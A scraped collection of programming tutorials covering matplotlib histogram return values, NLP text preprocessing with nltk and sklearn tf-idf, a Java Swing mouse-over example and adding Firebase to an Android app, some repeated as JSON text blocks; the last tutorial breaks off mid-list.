Git?" }, { "code": null, "e": 3206, "s": 3172, "text": "How to Push Git Branch to Remote?" }, { "code": null, "e": 3248, "s": 3206, "text": "How to Export Eclipse projects to GitHub?" }, { "code": null, "e": 3287, "s": 3248, "text": "Merge Conflicts and How to handle them" }, { "code": null, "e": 3326, "s": 3287, "text": "How to Add Git Credentials in Eclipse?" }, { "code": null, "e": 3350, "s": 3326, "text": "What is README.md File?" }, { "code": null, "e": 3370, "s": 3350, "text": "Git - Origin Master" }, { "code": null, "e": 3431, "s": 3370, "text": "How to Add Videos on README .md File in a GitHub Repository?" } ]
What are n, bins and patches in matplotlib?
The hist() method returns n, bins and patches in matplotlib. Patches are the containers of individual artists used to create the histogram or list of such containers if there are multiple input datasets. Bins define the number of equal-width bins in the range. Let's take an example to understand how it works. Set the figure size and adjust the padding between and around the subplots. Set the figure size and adjust the padding between and around the subplots. Create random data points using numpy. Create random data points using numpy. Make a Hist plot with 100 bins. Make a Hist plot with 100 bins. Set a property on an artist object. Set a property on an artist object. To display the figure, use show() method. To display the figure, use show() method. import numpy as np import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = [7.50, 3.50] plt.rcParams["figure.autolayout"] = True x = np.random.normal(size=100) n, bins, patches = plt.hist(x, bins=100) plt.setp(patches[0], 'facecolor', 'yellow') plt.show()
[ { "code": null, "e": 1323, "s": 1062, "text": "The hist() method returns n, bins and patches in matplotlib. Patches are the containers of individual artists used to create the histogram or list of such containers if there are multiple input datasets. Bins define the number of equal-width bins in the range." }, { "code": null, "e": 1373, "s": 1323, "text": "Let's take an example to understand how it works." }, { "code": null, "e": 1449, "s": 1373, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1525, "s": 1449, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1564, "s": 1525, "text": "Create random data points using numpy." }, { "code": null, "e": 1603, "s": 1564, "text": "Create random data points using numpy." }, { "code": null, "e": 1635, "s": 1603, "text": "Make a Hist plot with 100 bins." }, { "code": null, "e": 1667, "s": 1635, "text": "Make a Hist plot with 100 bins." }, { "code": null, "e": 1703, "s": 1667, "text": "Set a property on an artist object." }, { "code": null, "e": 1739, "s": 1703, "text": "Set a property on an artist object." }, { "code": null, "e": 1781, "s": 1739, "text": "To display the figure, use show() method." }, { "code": null, "e": 1823, "s": 1781, "text": "To display the figure, use show() method." }, { "code": null, "e": 2093, "s": 1823, "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\n\nx = np.random.normal(size=100)\n\nn, bins, patches = plt.hist(x, bins=100)\n\nplt.setp(patches[0], 'facecolor', 'yellow')\n\nplt.show()" } ]
Introduction to NLP - Part 1: Preprocessing text in Python | by Zolzaya Luvsandorj | Towards Data Science
Welcome to Introduction to NLP! This is the first part of the 5-part series of posts. This post will show one way to preprocess text using an approach called bag-of-words where each text is represented by its words regardless of the order in which they are presented or the embedded grammar. We will complete the following steps when preprocessing: TokeniseNormaliseRemove stop wordsCount vectoriseTransform to tf-idf representation Tokenise Normalise Remove stop words Count vectorise Transform to tf-idf representation 💤 Do these terms look like gibberish to you? Don’t worry, they will no longer be by the time you finish reading this post! 🎓 I assume the reader (👀 yes, you!) has access to and is familiar with Python including installing packages, defining functions and other basic tasks. If you are new to Python, this is a good place to get started. I have used and tested the scripts in Python 3.7.1. Let’s make sure you have the right tools before we get started. We will use the following powerful third party packages: pandas: Data analysis library, nltk: Natural Language Tool Kit library and sklearn: Machine Learning library. The script below can help you download these corpora. If you have already downloaded, running this will notify you that they are up-to-date: import nltknltk.download('stopwords') nltk.download('wordnet') To keep things manageable, we will use tiny text data which will allow us to monitor inputs and outputs for each step. For this data, I have chosen Joey’s draft speech for Chandler and Monica’s wedding from the sitcom Friends. His speech goes: part1 = """We are gathered here today on this joyous occasion to celebrate the special love that Monica and Chandler share. It is a love based on giving and receiving as well as having and sharing. And the love that they give and have is shared and received. Andthrough this having and giving and sharing and receiving, we too can share and love and have... and receive."""part2 = """When I think of the love these two givers and receivers share I cannot help but envy the lifetime ahead of having and loving and giving and receiving.""" If you haven’t seen the part I am referring, there are short videos available on YouTube (keywords: Joey’s wedding speech). I think Joey’s acting and Monica and Chandler’s reaction definitely makes this speech much funnier than the mere text. Writing this post gave me a nice excuse to watch the scene repeatedly and I can’t have enough of it. 🙈 Firstly, let’s prepare the environment with packages and data: # Import packages and modulesimport pandas as pdfrom nltk.stem import WordNetLemmatizerfrom nltk.tokenize import RegexpTokenizerfrom nltk.corpus import stopwordsfrom sklearn.feature_extraction.text import TfidfVectorizer# Create a dataframeX_train = pd.DataFrame([part1, part2], columns=['speech']) Secondly, let’s define a text preprocessing function to pass it on to TfidfVectorizer: def preprocess_text(text): # Tokenise words while ignoring punctuation tokeniser = RegexpTokenizer(r'\w+') tokens = tokeniser.tokenize(text) # Lowercase and lemmatise lemmatiser = WordNetLemmatizer() lemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens] # Remove stopwords keywords= [lemma for lemma in lemmas if lemma not in stopwords.words('english')] return keywords Lastly, let’s preprocess the text data by leveraging the function defined earlier: # Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech'])# Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which wordscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train Ta-da❕ We have preprocessed text into feature matrix. Do these scripts make much sense without any explanation? Let’s break this down and understand the 5 steps mentioned at the beginning with examples in the next section. 💡 “Given a character sequence and a defined document unit, tokenization is the task of chopping it up into pieces, called tokens, perhaps at the same time throwing away certain characters, such as punctuation.” In this step, we will convert a string part1 into list of tokens while discarding punctuation. There are many ways we could accomplish this task. I will show you one way to do so by using RegexpTokenizer from nltk: # Import modulefrom nltk.tokenize import RegexpTokenizer# Create an instance of RegexpTokenizer for alphanumeric tokenstokeniser = RegexpTokenizer(r'\w+')# Tokenise 'part1' stringtokens = tokeniser.tokenize(part1)print(tokens) Let’s inspect how tokens look like: We see that each word is now a separate string. Do you notice how there are variations of the same word? For instance: words can differ in terms of their case: ‘and’ and ‘And’ or their suffix: ‘share’, ‘shared’ and ‘sharing’. This is where normalisation comes in to standardise. 💡 To normalise a word is to transform it into its root form. Stemming and lemmatisation are popular ways to normalise text. In this step, we will use lemmatisation to transform words to their dictionary form as well as remove case distinction by converting all words to lowercase. 🔗 If you want to learn more about stemming and lemmatisation, you may want to check out the second part of the series. We will use WordNetLemmatizer from nltk to lemmatise our tokens: # Import modulefrom nltk.stem import WordNetLemmatizer# Create an instance of WordNetLemmatizerlemmatiser = WordNetLemmatizer()# Lowercase and lemmatise tokenslemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens]print(lemmas) The words are now transformed to its dictionary form. For instance, ‘share’, ‘sharing’ and ‘shared’ are now all just ‘share’. # Check how many words we havelen(lemmas) We have 66 words but not all words carry the same level of contribution to the meaning of the text. In other words, there are some words that are not particularly useful to the key message. This is where stop words come in. 💡 Stop words are common words which provide little to no value to the meaning of the text. Think about this: If you had to describe yourself in three words as elaborately as possible, would you include ‘I’, or ‘am’? If I asked you to underline keywords in Joey’s speech, would you underline ‘a’ or ‘the’? Probably not. The ‘I’, ‘am’, ‘a’ and ‘the’ are examples of stop words. I think you get the idea. Different sets of stop words may be necessary depending on the domain that the text is related to. In this step, we will leverage nltk’s stopwords corpus. You could define your own set of stop words or enrich standard stop words by adding common terms that are appropriate to the domain of the text. Let’s first familiarise ourselves with stopwords little bit more: # Import modulefrom nltk.corpus import stopwords# Check out how many stop words there are print(len(stopwords.words('english')))# See first 5 stop wordsstopwords.words('english')[:5] At the time of writing this post, there are 179 english stop words in the nltk’s stopword corpus. Some examples include: ‘i’, ‘me’, ‘my’, ‘myself’, ‘we’. If you are curious to see the full list, simply remove [:5] from the last line of code. Notice how these stop words are in lowercase? To effectively remove stop words, we have to ensure that all words are in lowercase. Here, we have already done so in step two. Using a list comprehension, let’s remove all stop words from our list: keywords = [lemma for lemma in lemmas if lemma not in stopwords.words('english')]print(keywords) # Check how many words we havelen(keywords) After removing stop words, we only have 26 words as opposed to 66 yet the gist is still preserved. Now, if you scroll back up to section 2 (Final Code) and have a quick look at the preprocess_text function, you will see that this function captures the transformation process shown in steps 1 to 3. 💡 Count vectorise is to convert a collection of text documents to a matrix of token counts. Now let’s look at counts of each word in keywords from step 3: {word: keywords.count(word) for word in set(keywords)} The word ‘give’ occurs 3 times whereas ‘joyous’ was mentioned once. This is essentially what CountVectorizer does to all records. CountVectorizer transforms text into a matrix of m by n where m is the number of text records, n is the number of unique tokens across all records and the elements of the matrix refer to the tally of a token for a given record. In this step, we will convert our text dataframe to count matrix. We will pass our custom preprocessor function to CountVectorizer: # Import modulefrom sklearn.feature_extraction.text import CountVectorizer# Create an instance of CountfVectorizervectoriser = CountVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech']) The output feature matrix will be in sparse_matrix form. Let’s convert it to a dataframe with proper column names to make it more readible: # Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which termscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train Once we transform it to dataframe, the columns would be just indices (i.e. numbers from 0 to n-1) instead of the actual words. Therefore, we need to rename the columns to make it easier to interpret. When the vectoriser is fit to the data, we can find out the index mapping to words from vectoriser.vocabulary_. This index mapping is formatted as {word:index}. To rename columns, we must switch the key-value pairs to {index:word}. This is done in the second line of code and saved in col_map. Using for loop at the end of the code, we are renaming each column using the mapping, and the output should look like what is in the table above (showing only partial output due to space limitation). From this matrix, we can see ‘give’ has been mentioned 3 times in part1 (row index=0) and once in part2 (row index=1). In our example, we only have 2 records each consisting of only a handful of sentences, so the count matrix is pretty small and its sparsity is not as high. Sparsity refers to the proportion of zero elements among all elements in a matrix. When you are working on real data with hundreds, thousands or even millions of records each represented by rich text, the count matrix is likely to be extremely large and contain mostly 0s. In those instances, using sparse format saves storage memory and speeds up further processing. As a result, you may not always convert sparse matrix to a dataframe like we did here for illustration when preprocessing text in real life. 💡 tf-idf stands for term frequency inverse document frequency. When transforming to tf-idf representation, we are transforming the counts to weighted frequency where we give more significance to less frequent words and less importance to more frequent words by using a weight called inverse document frequency. 🔗 I have dedicated a separate post to explain this in detail in the third part of the series because I think it deserves its own section. # Import modulefrom sklearn.feature_extraction.text import TfidfTransformer# Create an instance of TfidfTransformertransformer = TfidfTransformer()# Fit to the data and transform to tf-idfX_train = pd.DataFrame(transformer.fit_transform(X_train).toarray(), columns=X_train.columns)X_train In the last step, we ensured that output is still a properly named dataframe: Now that we understand step 4 and step 5 individually, I would like to point out that there is a more efficient way to complete steps 4 and 5 using TfidfVectorizer. Such is accomplished using the code below: # Import modulefrom sklearn.feature_extraction.text import TfidfVectorizer# Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to tf-idfX_train = vectoriser.fit_transform(X_train['speech']) To make this sparse matrix output into a dataframe with relevant column names, you know what to do (hint: see what we did in step 4). Having covered all steps, if you go back to the scripts in section 2 (Final Code) again, does it look more familiar than the first time you saw? 👀 Would you like to access more content like this? Medium members get unlimited access to any articles on Medium. If you become a member using my referral link, a portion of your membership fee will directly go to support me. Thank you for taking the time to go through this post. I hope that you learned something from reading it. Links to the rest of the posts are collated below:◼️ Part 1: Preprocessing text in Python◼️ Part 2: Difference between lemmatisation and stemming◼️ Part 3: TF-IDF explained◼️ Part 4: Supervised text classification model in Python◼️ Part 5A: Unsupervised topic model in Python (sklearn)◼️ Part 5B: Unsupervised topic model in Python (gensim) Happy preprocessing! Bye for now 🏃💨 Christopher D. Manning, Prabhakar Raghavan and Hinrich Schütze, Introduction to Information Retrieval, Cambridge University Press, 2008 Bird, Steven, Edward Loper and Ewan Klein, Natural Language Processing with Python. O’Reilly Media Inc, 2009 Feature Extraction, sklearn documentation
[ { "code": null, "e": 520, "s": 171, "text": "Welcome to Introduction to NLP! This is the first part of the 5-part series of posts. This post will show one way to preprocess text using an approach called bag-of-words where each text is represented by its words regardless of the order in which they are presented or the embedded grammar. We will complete the following steps when preprocessing:" }, { "code": null, "e": 604, "s": 520, "text": "TokeniseNormaliseRemove stop wordsCount vectoriseTransform to tf-idf representation" }, { "code": null, "e": 613, "s": 604, "text": "Tokenise" }, { "code": null, "e": 623, "s": 613, "text": "Normalise" }, { "code": null, "e": 641, "s": 623, "text": "Remove stop words" }, { "code": null, "e": 657, "s": 641, "text": "Count vectorise" }, { "code": null, "e": 692, "s": 657, "text": "Transform to tf-idf representation" }, { "code": null, "e": 817, "s": 692, "text": "💤 Do these terms look like gibberish to you? Don’t worry, they will no longer be by the time you finish reading this post! 🎓" }, { "code": null, "e": 1029, "s": 817, "text": "I assume the reader (👀 yes, you!) has access to and is familiar with Python including installing packages, defining functions and other basic tasks. If you are new to Python, this is a good place to get started." }, { "code": null, "e": 1145, "s": 1029, "text": "I have used and tested the scripts in Python 3.7.1. Let’s make sure you have the right tools before we get started." }, { "code": null, "e": 1202, "s": 1145, "text": "We will use the following powerful third party packages:" }, { "code": null, "e": 1233, "s": 1202, "text": "pandas: Data analysis library," }, { "code": null, "e": 1277, "s": 1233, "text": "nltk: Natural Language Tool Kit library and" }, { "code": null, "e": 1312, "s": 1277, "text": "sklearn: Machine Learning library." }, { "code": null, "e": 1453, "s": 1312, "text": "The script below can help you download these corpora. If you have already downloaded, running this will notify you that they are up-to-date:" }, { "code": null, "e": 1516, "s": 1453, "text": "import nltknltk.download('stopwords') nltk.download('wordnet')" }, { "code": null, "e": 1743, "s": 1516, "text": "To keep things manageable, we will use tiny text data which will allow us to monitor inputs and outputs for each step. For this data, I have chosen Joey’s draft speech for Chandler and Monica’s wedding from the sitcom Friends." }, { "code": null, "e": 1760, "s": 1743, "text": "His speech goes:" }, { "code": null, "e": 2298, "s": 1760, "text": "part1 = \"\"\"We are gathered here today on this joyous occasion to celebrate the special love that Monica and Chandler share. It is a love based on giving and receiving as well as having and sharing. And the love that they give and have is shared and received. Andthrough this having and giving and sharing and receiving, we too can share and love and have... and receive.\"\"\"part2 = \"\"\"When I think of the love these two givers and receivers share I cannot help but envy the lifetime ahead of having and loving and giving and receiving.\"\"\"" }, { "code": null, "e": 2644, "s": 2298, "text": "If you haven’t seen the part I am referring, there are short videos available on YouTube (keywords: Joey’s wedding speech). I think Joey’s acting and Monica and Chandler’s reaction definitely makes this speech much funnier than the mere text. Writing this post gave me a nice excuse to watch the scene repeatedly and I can’t have enough of it. 🙈" }, { "code": null, "e": 2707, "s": 2644, "text": "Firstly, let’s prepare the environment with packages and data:" }, { "code": null, "e": 3006, "s": 2707, "text": "# Import packages and modulesimport pandas as pdfrom nltk.stem import WordNetLemmatizerfrom nltk.tokenize import RegexpTokenizerfrom nltk.corpus import stopwordsfrom sklearn.feature_extraction.text import TfidfVectorizer# Create a dataframeX_train = pd.DataFrame([part1, part2], columns=['speech'])" }, { "code": null, "e": 3093, "s": 3006, "text": "Secondly, let’s define a text preprocessing function to pass it on to TfidfVectorizer:" }, { "code": null, "e": 3521, "s": 3093, "text": "def preprocess_text(text): # Tokenise words while ignoring punctuation tokeniser = RegexpTokenizer(r'\\w+') tokens = tokeniser.tokenize(text) # Lowercase and lemmatise lemmatiser = WordNetLemmatizer() lemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens] # Remove stopwords keywords= [lemma for lemma in lemmas if lemma not in stopwords.words('english')] return keywords" }, { "code": null, "e": 3604, "s": 3521, "text": "Lastly, let’s preprocess the text data by leveraging the function defined earlier:" }, { "code": null, "e": 4130, "s": 3604, "text": "# Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech'])# Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which wordscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train" }, { "code": null, "e": 4353, "s": 4130, "text": "Ta-da❕ We have preprocessed text into feature matrix. Do these scripts make much sense without any explanation? Let’s break this down and understand the 5 steps mentioned at the beginning with examples in the next section." }, { "code": null, "e": 4564, "s": 4353, "text": "💡 “Given a character sequence and a defined document unit, tokenization is the task of chopping it up into pieces, called tokens, perhaps at the same time throwing away certain characters, such as punctuation.”" }, { "code": null, "e": 4779, "s": 4564, "text": "In this step, we will convert a string part1 into list of tokens while discarding punctuation. There are many ways we could accomplish this task. I will show you one way to do so by using RegexpTokenizer from nltk:" }, { "code": null, "e": 5006, "s": 4779, "text": "# Import modulefrom nltk.tokenize import RegexpTokenizer# Create an instance of RegexpTokenizer for alphanumeric tokenstokeniser = RegexpTokenizer(r'\\w+')# Tokenise 'part1' stringtokens = tokeniser.tokenize(part1)print(tokens)" }, { "code": null, "e": 5042, "s": 5006, "text": "Let’s inspect how tokens look like:" }, { "code": null, "e": 5321, "s": 5042, "text": "We see that each word is now a separate string. Do you notice how there are variations of the same word? For instance: words can differ in terms of their case: ‘and’ and ‘And’ or their suffix: ‘share’, ‘shared’ and ‘sharing’. This is where normalisation comes in to standardise." }, { "code": null, "e": 5382, "s": 5321, "text": "💡 To normalise a word is to transform it into its root form." }, { "code": null, "e": 5602, "s": 5382, "text": "Stemming and lemmatisation are popular ways to normalise text. In this step, we will use lemmatisation to transform words to their dictionary form as well as remove case distinction by converting all words to lowercase." }, { "code": null, "e": 5721, "s": 5602, "text": "🔗 If you want to learn more about stemming and lemmatisation, you may want to check out the second part of the series." }, { "code": null, "e": 5786, "s": 5721, "text": "We will use WordNetLemmatizer from nltk to lemmatise our tokens:" }, { "code": null, "e": 6034, "s": 5786, "text": "# Import modulefrom nltk.stem import WordNetLemmatizer# Create an instance of WordNetLemmatizerlemmatiser = WordNetLemmatizer()# Lowercase and lemmatise tokenslemmas = [lemmatiser.lemmatize(token.lower(), pos='v') for token in tokens]print(lemmas)" }, { "code": null, "e": 6160, "s": 6034, "text": "The words are now transformed to its dictionary form. For instance, ‘share’, ‘sharing’ and ‘shared’ are now all just ‘share’." }, { "code": null, "e": 6202, "s": 6160, "text": "# Check how many words we havelen(lemmas)" }, { "code": null, "e": 6426, "s": 6202, "text": "We have 66 words but not all words carry the same level of contribution to the meaning of the text. In other words, there are some words that are not particularly useful to the key message. This is where stop words come in." }, { "code": null, "e": 6517, "s": 6426, "text": "💡 Stop words are common words which provide little to no value to the meaning of the text." }, { "code": null, "e": 6828, "s": 6517, "text": "Think about this: If you had to describe yourself in three words as elaborately as possible, would you include ‘I’, or ‘am’? If I asked you to underline keywords in Joey’s speech, would you underline ‘a’ or ‘the’? Probably not. The ‘I’, ‘am’, ‘a’ and ‘the’ are examples of stop words. I think you get the idea." }, { "code": null, "e": 7128, "s": 6828, "text": "Different sets of stop words may be necessary depending on the domain that the text is related to. In this step, we will leverage nltk’s stopwords corpus. You could define your own set of stop words or enrich standard stop words by adding common terms that are appropriate to the domain of the text." }, { "code": null, "e": 7194, "s": 7128, "text": "Let’s first familiarise ourselves with stopwords little bit more:" }, { "code": null, "e": 7377, "s": 7194, "text": "# Import modulefrom nltk.corpus import stopwords# Check out how many stop words there are print(len(stopwords.words('english')))# See first 5 stop wordsstopwords.words('english')[:5]" }, { "code": null, "e": 7619, "s": 7377, "text": "At the time of writing this post, there are 179 english stop words in the nltk’s stopword corpus. Some examples include: ‘i’, ‘me’, ‘my’, ‘myself’, ‘we’. If you are curious to see the full list, simply remove [:5] from the last line of code." }, { "code": null, "e": 7793, "s": 7619, "text": "Notice how these stop words are in lowercase? To effectively remove stop words, we have to ensure that all words are in lowercase. Here, we have already done so in step two." }, { "code": null, "e": 7864, "s": 7793, "text": "Using a list comprehension, let’s remove all stop words from our list:" }, { "code": null, "e": 7961, "s": 7864, "text": "keywords = [lemma for lemma in lemmas if lemma not in stopwords.words('english')]print(keywords)" }, { "code": null, "e": 8005, "s": 7961, "text": "# Check how many words we havelen(keywords)" }, { "code": null, "e": 8104, "s": 8005, "text": "After removing stop words, we only have 26 words as opposed to 66 yet the gist is still preserved." }, { "code": null, "e": 8303, "s": 8104, "text": "Now, if you scroll back up to section 2 (Final Code) and have a quick look at the preprocess_text function, you will see that this function captures the transformation process shown in steps 1 to 3." }, { "code": null, "e": 8395, "s": 8303, "text": "💡 Count vectorise is to convert a collection of text documents to a matrix of token counts." }, { "code": null, "e": 8458, "s": 8395, "text": "Now let’s look at counts of each word in keywords from step 3:" }, { "code": null, "e": 8513, "s": 8458, "text": "{word: keywords.count(word) for word in set(keywords)}" }, { "code": null, "e": 8581, "s": 8513, "text": "The word ‘give’ occurs 3 times whereas ‘joyous’ was mentioned once." }, { "code": null, "e": 8871, "s": 8581, "text": "This is essentially what CountVectorizer does to all records. CountVectorizer transforms text into a matrix of m by n where m is the number of text records, n is the number of unique tokens across all records and the elements of the matrix refer to the tally of a token for a given record." }, { "code": null, "e": 9003, "s": 8871, "text": "In this step, we will convert our text dataframe to count matrix. We will pass our custom preprocessor function to CountVectorizer:" }, { "code": null, "e": 9274, "s": 9003, "text": "# Import modulefrom sklearn.feature_extraction.text import CountVectorizer# Create an instance of CountfVectorizervectoriser = CountVectorizer(analyzer=preprocess_text)# Fit to the data and transform to feature matrixX_train = vectoriser.fit_transform(X_train['speech'])" }, { "code": null, "e": 9414, "s": 9274, "text": "The output feature matrix will be in sparse_matrix form. Let’s convert it to a dataframe with proper column names to make it more readible:" }, { "code": null, "e": 9745, "s": 9414, "text": "# Convert sparse matrix to dataframeX_train = pd.DataFrame.sparse.from_spmatrix(X_train)# Save mapping on which index refers to which termscol_map = {v:k for k, v in vectoriser.vocabulary_.items()}# Rename each column using the mappingfor col in X_train.columns: X_train.rename(columns={col: col_map[col]}, inplace=True)X_train" }, { "code": null, "e": 9945, "s": 9745, "text": "Once we transform it to dataframe, the columns would be just indices (i.e. numbers from 0 to n-1) instead of the actual words. Therefore, we need to rename the columns to make it easier to interpret." }, { "code": null, "e": 10239, "s": 9945, "text": "When the vectoriser is fit to the data, we can find out the index mapping to words from vectoriser.vocabulary_. This index mapping is formatted as {word:index}. To rename columns, we must switch the key-value pairs to {index:word}. This is done in the second line of code and saved in col_map." }, { "code": null, "e": 10439, "s": 10239, "text": "Using for loop at the end of the code, we are renaming each column using the mapping, and the output should look like what is in the table above (showing only partial output due to space limitation)." }, { "code": null, "e": 10558, "s": 10439, "text": "From this matrix, we can see ‘give’ has been mentioned 3 times in part1 (row index=0) and once in part2 (row index=1)." }, { "code": null, "e": 11223, "s": 10558, "text": "In our example, we only have 2 records each consisting of only a handful of sentences, so the count matrix is pretty small and its sparsity is not as high. Sparsity refers to the proportion of zero elements among all elements in a matrix. When you are working on real data with hundreds, thousands or even millions of records each represented by rich text, the count matrix is likely to be extremely large and contain mostly 0s. In those instances, using sparse format saves storage memory and speeds up further processing. As a result, you may not always convert sparse matrix to a dataframe like we did here for illustration when preprocessing text in real life." }, { "code": null, "e": 11286, "s": 11223, "text": "💡 tf-idf stands for term frequency inverse document frequency." }, { "code": null, "e": 11534, "s": 11286, "text": "When transforming to tf-idf representation, we are transforming the counts to weighted frequency where we give more significance to less frequent words and less importance to more frequent words by using a weight called inverse document frequency." }, { "code": null, "e": 11672, "s": 11534, "text": "🔗 I have dedicated a separate post to explain this in detail in the third part of the series because I think it deserves its own section." }, { "code": null, "e": 11961, "s": 11672, "text": "# Import modulefrom sklearn.feature_extraction.text import TfidfTransformer# Create an instance of TfidfTransformertransformer = TfidfTransformer()# Fit to the data and transform to tf-idfX_train = pd.DataFrame(transformer.fit_transform(X_train).toarray(), columns=X_train.columns)X_train" }, { "code": null, "e": 12039, "s": 11961, "text": "In the last step, we ensured that output is still a properly named dataframe:" }, { "code": null, "e": 12247, "s": 12039, "text": "Now that we understand step 4 and step 5 individually, I would like to point out that there is a more efficient way to complete steps 4 and 5 using TfidfVectorizer. Such is accomplished using the code below:" }, { "code": null, "e": 12509, "s": 12247, "text": "# Import modulefrom sklearn.feature_extraction.text import TfidfVectorizer# Create an instance of TfidfVectorizervectoriser = TfidfVectorizer(analyzer=preprocess_text)# Fit to the data and transform to tf-idfX_train = vectoriser.fit_transform(X_train['speech'])" }, { "code": null, "e": 12643, "s": 12509, "text": "To make this sparse matrix output into a dataframe with relevant column names, you know what to do (hint: see what we did in step 4)." }, { "code": null, "e": 12790, "s": 12643, "text": "Having covered all steps, if you go back to the scripts in section 2 (Final Code) again, does it look more familiar than the first time you saw? 👀" }, { "code": null, "e": 13014, "s": 12790, "text": "Would you like to access more content like this? Medium members get unlimited access to any articles on Medium. If you become a member using my referral link, a portion of your membership fee will directly go to support me." }, { "code": null, "e": 13461, "s": 13014, "text": "Thank you for taking the time to go through this post. I hope that you learned something from reading it. Links to the rest of the posts are collated below:◼️ Part 1: Preprocessing text in Python◼️ Part 2: Difference between lemmatisation and stemming◼️ Part 3: TF-IDF explained◼️ Part 4: Supervised text classification model in Python◼️ Part 5A: Unsupervised topic model in Python (sklearn)◼️ Part 5B: Unsupervised topic model in Python (gensim)" }, { "code": null, "e": 13497, "s": 13461, "text": "Happy preprocessing! Bye for now 🏃💨" }, { "code": null, "e": 13634, "s": 13497, "text": "Christopher D. Manning, Prabhakar Raghavan and Hinrich Schütze, Introduction to Information Retrieval, Cambridge University Press, 2008" }, { "code": null, "e": 13743, "s": 13634, "text": "Bird, Steven, Edward Loper and Ewan Klein, Natural Language Processing with Python. O’Reilly Media Inc, 2009" } ]
How can we detect an event when the mouse moves over any component in Java?
We can implement a MouseListener interface when the mouse is stable while handling the mouse event. A MouseEvent is fired when we can press, release or click (press followed by release) a mouse button (left or right button) at the source object or position the mouse pointer at (enter) and away (exit) from the source object. We can detect a mouse event when the mouse moves over any component such as a label by using the mouseEntered() method and can be exited by using mouseExited() method of MouseAdapter class or MouseListener interface. import java.awt.*; import java.awt.event.*; import javax.swing.*; public class MouseOverTest extends JFrame { private JLabel label; public MouseOverTest() { setTitle("MouseOver Test"); setLayout(new FlowLayout()); label = new JLabel("Move the mouse moves over this JLabel"); label.setOpaque(true); add(label); label.addMouseListener(new MouseAdapter() { public void mouseEntered(MouseEvent evt) { Color c = label.getBackground(); // When the mouse moves over a label, the background color changed. label.setBackground(label.getForeground()); label.setForeground(c); } public void mouseExited(MouseEvent evt) { Color c = label.getBackground(); label.setBackground(label.getForeground()); label.setForeground(c); } }); setSize(400, 275); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setLocationRelativeTo(null); setVisible(true); } public static void main(String[] args) { new MouseOverTest(); } }
[ { "code": null, "e": 1605, "s": 1062, "text": "We can implement a MouseListener interface when the mouse is stable while handling the mouse event. A MouseEvent is fired when we can press, release or click (press followed by release) a mouse button (left or right button) at the source object or position the mouse pointer at (enter) and away (exit) from the source object. We can detect a mouse event when the mouse moves over any component such as a label by using the mouseEntered() method and can be exited by using mouseExited() method of MouseAdapter class or MouseListener interface." }, { "code": null, "e": 2699, "s": 1605, "text": "import java.awt.*;\nimport java.awt.event.*;\nimport javax.swing.*;\npublic class MouseOverTest extends JFrame {\n private JLabel label;\n public MouseOverTest() {\n setTitle(\"MouseOver Test\");\n setLayout(new FlowLayout());\n label = new JLabel(\"Move the mouse moves over this JLabel\");\n label.setOpaque(true);\n add(label);\n label.addMouseListener(new MouseAdapter() {\n public void mouseEntered(MouseEvent evt) {\n Color c = label.getBackground(); // When the mouse moves over a label, the background color changed.\n label.setBackground(label.getForeground());\n label.setForeground(c);\n }\n public void mouseExited(MouseEvent evt) {\n Color c = label.getBackground();\n label.setBackground(label.getForeground());\n label.setForeground(c);\n }\n });\n setSize(400, 275);\n setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n setLocationRelativeTo(null);\n setVisible(true);\n }\n public static void main(String[] args) {\n new MouseOverTest();\n }\n}" } ]
Adding Firebase to Android App - GeeksforGeeks
18 Oct, 2021 There are various services offered online such as storage, online processing, realtime database, authorisation of user etc. Google developed a platform called Firebase that provide all these online services. It also gives a daily analysis of usage of these services along with the details of user using it. To simplify, it can be said that Firebase is a mobile and web application development platform. It provides services that a web application or mobile application might require. Anyone can easily include firebase to there application and it will make their online work way easier than it was used to be. There are two ways to add firebase to any Android app: Below are the steps to include Firebase to Android project in Android studio: Update the android studio (>= 2.2)Create a new project in the firebase by clicking on the Add project.Now open the android studio and click on Tools in the upper left corner.Now click on the Firebase option in the drop down menu.A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service.Now Click on the Connect to Firebase option in the menu of desired service.Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen) Update the android studio (>= 2.2) Create a new project in the firebase by clicking on the Add project. Now open the android studio and click on Tools in the upper left corner. Now click on the Firebase option in the drop down menu. A menu will appear on the right side of screen. It will show various services that Firebase offers. Choose the desired service. Now Click on the Connect to Firebase option in the menu of desired service. Add the dependencies of your service by clicking on the Add [YOUR SERVICE NAME] to the app option. (In the image below, the Firebase cloud messaging service is chosen) In this, the steps involve: Create a firebase projectCreate a project by clicking on create project in the firebase console.Fill the necessary details in the pop up window about the project. Edit the project ID if required.Click on create project to finally create it.Now add this project to the android appClick on the Add firebase to your 